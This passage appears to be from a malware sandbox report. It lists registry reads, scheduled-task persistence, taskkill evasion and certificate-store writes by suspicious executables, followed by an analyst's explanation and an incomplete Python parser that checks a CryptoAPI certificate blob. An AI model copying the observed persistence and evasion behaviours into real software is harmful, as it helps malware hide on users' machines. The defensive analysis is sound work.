Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\0709047991.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Platform Specific Field 1 C:\Users\Admin\AppData\Local\Temp\0709047991.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Update Status C:\Users\Admin\AppData\Local\Temp\0709047991.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Status C:\Users\Admin\AppData\Local\Temp\0709047991.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Windows\servicing\TrustedInstaller.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\FeatureSet C:\Windows\servicing\TrustedInstaller.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString C:\Windows\servicing\TrustedInstaller.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\Pictures\shZ2QlXdkmTmsk4zR41gLVc7.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Previous Update Revision C:\Users\Admin\AppData\Local\Temp\0709047991.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\servicing\TrustedInstaller.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Update Revision C:\Windows\servicing\TrustedInstaller.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\0709047991.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\FeatureSet C:\Users\Admin\AppData\Local\Temp\0709047991.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\0709047991.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Update Revision C:\Users\Admin\AppData\Local\Temp\0709047991.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Users\Admin\AppData\Local\Temp\0709047991.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Configuration Data C:\Users\Admin\AppData\Local\Temp\0709047991.exe N/A
Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor C:\Windows\servicing\TrustedInstaller.exe N/A
Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 C:\Windows\servicing\TrustedInstaller.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information C:\Windows\servicing\TrustedInstaller.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Status C:\Windows\servicing\TrustedInstaller.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\System32\schtasks.exe N/A
N/A N/A C:\Windows\System32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2432 = "Cuba Standard Time" C:\Users\Admin\Pictures\Q0fnIUXTM79rNZPhQcruvlJ5.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-251 = "Dateline Daylight Time" C:\Users\Admin\Pictures\OXfHzDyjJ3Wst2kNf3cg9erd.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-335 = "Jordan Standard Time" C:\Users\Admin\Pictures\OXfHzDyjJ3Wst2kNf3cg9erd.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1022 = "Bangladesh Standard Time" C:\Users\Admin\Pictures\OXfHzDyjJ3Wst2kNf3cg9erd.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-682 = "E. Australia Standard Time" C:\Users\Admin\Pictures\Q0fnIUXTM79rNZPhQcruvlJ5.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-671 = "AUS Eastern Daylight Time" C:\Users\Admin\Pictures\OXfHzDyjJ3Wst2kNf3cg9erd.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1971 = "Belarus Daylight Time" C:\Users\Admin\Pictures\OXfHzDyjJ3Wst2kNf3cg9erd.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-571 = "China Daylight Time" C:\Users\Admin\Pictures\OXfHzDyjJ3Wst2kNf3cg9erd.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-912 = "Mauritius Standard Time" C:\Users\Admin\Pictures\OXfHzDyjJ3Wst2kNf3cg9erd.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-182 = "Mountain Standard Time (Mexico)" C:\Users\Admin\Pictures\OXfHzDyjJ3Wst2kNf3cg9erd.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1891 = "Russia TZ 3 Daylight Time" C:\Users\Admin\Pictures\OXfHzDyjJ3Wst2kNf3cg9erd.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-141 = "Canada Central Daylight Time" C:\Users\Admin\Pictures\Q0fnIUXTM79rNZPhQcruvlJ5.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2041 = "Eastern Daylight Time (Mexico)" C:\Users\Admin\Pictures\Q0fnIUXTM79rNZPhQcruvlJ5.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-384 = "Namibia Daylight Time" C:\Users\Admin\Pictures\OXfHzDyjJ3Wst2kNf3cg9erd.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-731 = "Fiji Daylight Time" C:\Users\Admin\Pictures\Q0fnIUXTM79rNZPhQcruvlJ5.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1801 = "Line Islands Daylight Time" C:\Users\Admin\Pictures\OXfHzDyjJ3Wst2kNf3cg9erd.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-92 = "Pacific SA Standard Time" C:\Users\Admin\Pictures\OXfHzDyjJ3Wst2kNf3cg9erd.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-832 = "SA Eastern Standard Time" C:\Users\Admin\Pictures\OXfHzDyjJ3Wst2kNf3cg9erd.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-662 = "Cen. Australia Standard Time" C:\Users\Admin\Pictures\OXfHzDyjJ3Wst2kNf3cg9erd.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-251 = "Dateline Daylight Time" C:\Users\Admin\Pictures\Q0fnIUXTM79rNZPhQcruvlJ5.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-81 = "Atlantic Daylight Time" C:\Users\Admin\Pictures\OXfHzDyjJ3Wst2kNf3cg9erd.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2531 = "Chatham Islands Daylight Time" C:\Users\Admin\Pictures\Q0fnIUXTM79rNZPhQcruvlJ5.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2432 = "Cuba Standard Time" C:\Users\Admin\Pictures\OXfHzDyjJ3Wst2kNf3cg9erd.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2342 = "Haiti Standard Time" C:\Users\Admin\Pictures\Q0fnIUXTM79rNZPhQcruvlJ5.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-364 = "Middle East Daylight Time" C:\Users\Admin\Pictures\OXfHzDyjJ3Wst2kNf3cg9erd.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-961 = "Paraguay Daylight Time" C:\Users\Admin\Pictures\OXfHzDyjJ3Wst2kNf3cg9erd.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2141 = "Transbaikal Daylight Time" C:\Users\Admin\Pictures\Q0fnIUXTM79rNZPhQcruvlJ5.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-104 = "Central Brazilian Daylight Time" C:\Users\Admin\Pictures\Q0fnIUXTM79rNZPhQcruvlJ5.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-104 = "Central Brazilian Daylight Time" C:\Users\Admin\Pictures\OXfHzDyjJ3Wst2kNf3cg9erd.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1822 = "Russia TZ 1 Standard Time" C:\Users\Admin\Pictures\OXfHzDyjJ3Wst2kNf3cg9erd.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-651 = "AUS Central Daylight Time" C:\Users\Admin\Pictures\Q0fnIUXTM79rNZPhQcruvlJ5.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-11 = "Azores Daylight Time" C:\Users\Admin\Pictures\OXfHzDyjJ3Wst2kNf3cg9erd.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1972 = "Belarus Standard Time" C:\Users\Admin\Pictures\OXfHzDyjJ3Wst2kNf3cg9erd.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-602 = "Taipei Standard Time" C:\Users\Admin\Pictures\OXfHzDyjJ3Wst2kNf3cg9erd.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-932 = "Coordinated Universal Time" C:\Users\Admin\Pictures\Q0fnIUXTM79rNZPhQcruvlJ5.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-152 = "Central America Standard Time" C:\Users\Admin\Pictures\Q0fnIUXTM79rNZPhQcruvlJ5.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-831 = "SA Eastern Daylight Time" C:\Users\Admin\Pictures\OXfHzDyjJ3Wst2kNf3cg9erd.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-41 = "E. South America Daylight Time" C:\Users\Admin\Pictures\Q0fnIUXTM79rNZPhQcruvlJ5.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1832 = "Russia TZ 2 Standard Time" C:\Users\Admin\Pictures\OXfHzDyjJ3Wst2kNf3cg9erd.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-692 = "Tasmania Standard Time" C:\Users\Admin\Pictures\OXfHzDyjJ3Wst2kNf3cg9erd.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1042 = "Ulaanbaatar Standard Time" C:\Users\Admin\Pictures\OXfHzDyjJ3Wst2kNf3cg9erd.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1932 = "Russia TZ 11 Standard Time" C:\Users\Admin\Pictures\OXfHzDyjJ3Wst2kNf3cg9erd.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2713497151-363818805-1301026598-1000_Classes\Local Settings C:\Windows\servicing\TrustedInstaller.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 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 C:\Users\Admin\Pictures\O7qOvO0qMmQjettcsUNpgMj9.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 C:\Users\Admin\Pictures\O7qOvO0qMmQjettcsUNpgMj9.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 C:\Users\Admin\Pictures\O7qOvO0qMmQjettcsUNpgMj9.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 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 C:\Users\Admin\Pictures\O7qOvO0qMmQjettcsUNpgMj9.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 C:\Users\Admin\Pictures\O7qOvO0qMmQjettcsUNpgMj9.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 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 C:\Users\Admin\Pictures\O7qOvO0qMmQjettcsUNpgMj9.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 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 C:\Users\Admin\Pictures\O7qOvO0qMmQjettcsUNpgMj9.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 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 C:\Users\Admin\Pictures\O7qOvO0qMmQjettcsUNpgMj9.exe N/A
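
The AuthRoot writes above deserve a check rather than the signature's label alone. A value named Blob under SystemCertificates\<store>\Certificates\<SHA-1> is CryptoAPI's serialized certificate context: a run of {property id, flags, length, data} records with the DER certificate in property 32 (CERT_CERT_PROP_ID) and the hashes CryptoAPI computed for it stored beside it (properties 3 and 98). The Python below, an added example and not part of the sandbox report, parses that layout, recomputes SHA-1 and SHA-256 over the embedded certificate, and compares them with the key name and the stored hash properties. Its input is the 0563B863... Blob value from the table, copied as one contiguous hex string; the property names in the comments are the CERT_*_PROP_ID constants from wincrypt.h, and the ASN.1 handling is a deliberately minimal scan for commonName rather than a full X.509 parser. On this entry it recovers a self-signed certificate with CN DigiCert Assured ID Root CA, a public root that Windows' automatic root update installs into AuthRoot when a process builds a chain that ends in it; the powershell.exe 'Key created ... \.DEFAULT\Software\Microsoft\SystemCertificates\...' rows in the HKEY_USERS table are the same machinery creating per-profile store keys under the SYSTEM profile. That makes this signature weak evidence on its own. The cases to escalate are a blob whose recomputed thumbprint disagrees with its key name or stored hashes, or a subject that cannot be traced to a public root; the same check applies to the DDFB16CD... entry once its blob is available.

```python
"""Parse a CryptoAPI certificate-store registry Blob and verify the certificate it carries."""
import hashlib
import struct

OID_COMMON_NAME = bytes.fromhex("0603550403")  # DER of id-at-commonName (2.5.4.3)

# Key name and Blob value copied from the AuthRoot row above, chunked per property.
# Property IDs are the CERT_*_PROP_ID values from wincrypt.h; the DER certificate is property 32.
AUTHROOT_KEY = "0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43"
NAME_HEX = (  # "C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert Assured ID Root CA"
    "3065310b300906035504061302555331153013060355040a130c446967694365727420496e63"
    "31193017060355040b13107777772e64696769636572742e636f6d"
    "312430220603550403131b4469676943657274204173737572656420494420526f6f74204341")
BLOB_HEX = (
    "0400000001000000" "10000000" "87ce0b7b2a0e4900e158719b37a89372"          # 4  MD5_HASH
    "0f00000001000000" "14000000" "6dca5bd00dcf1c0f327059d374b29ca6e3c50aa6"  # 15 SIGNATURE_HASH
    "5300000001000000" "40000000"                                               # 83 ROOT_PROGRAM_CERT_POLICIES
    "303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0"
    "301b060567810c010330123010060a2b0601040182373c0101030200c0"
    "0900000001000000" "34000000"                                               # 9  ENHKEY_USAGE
    "303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308"
    "6200000001000000" "20000000"                                               # 98 AUTH_ROOT_SHA256_HASH
    "3e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c"
    "1400000001000000" "14000000" "45eba2aff492cb82312d518ba7a7219df36dc80f"  # 20 KEY_IDENTIFIER
    "0b00000001000000" "12000000" "440069006700690043006500720074000000"      # 11 FRIENDLY_NAME (UTF-16LE)
    "1d00000001000000" "10000000" "4f5f106930398d09107b40c3c7ca8f1c"          # 29 SUBJECT_NAME_MD5_HASH
    "0300000001000000" "14000000" "0563b8630d62d75abbc8ab1e4bdfb5a899b24d43"  # 3  SHA1_HASH
    "1900000001000000" "10000000" "749966cecc95c1874194ca7203f9b620"          # 25 SUBJECT_PUBLIC_KEY_MD5_HASH
    "2000000001000000" "bb030000"                                               # 32 CERT: 0x3bb bytes of DER follow
    "308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039"            # Certificate, TBS, v3, serial
    "300d06092a864886f70d0101050500" + NAME_HEX +                               # sha1WithRSAEncryption, issuer
    "301e170d3036313131303030303030305a170d3331313131303030303030305a" + NAME_HEX +  # 2006-11-10..2031-11-10, subject
    "30820122300d06092a864886f70d01010105000382010f003082010a0282010100"        # RSA SubjectPublicKeyInfo, modulus:
    "ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c3184"
    "2af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3"
    "a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed3917"
    "9d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f"
    "0203010001"                                                                # public exponent 65537
    "a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff"  # extensions: KeyUsage, BasicConstraints CA:TRUE
    "301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f"            # SubjectKeyIdentifier
    "301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f"        # AuthorityKeyIdentifier (same as SKI)
    "300d06092a864886f70d0101050500" "0382010100"                               # sha1WithRSAEncryption, signature:
    "a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12"
    "d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f0105"
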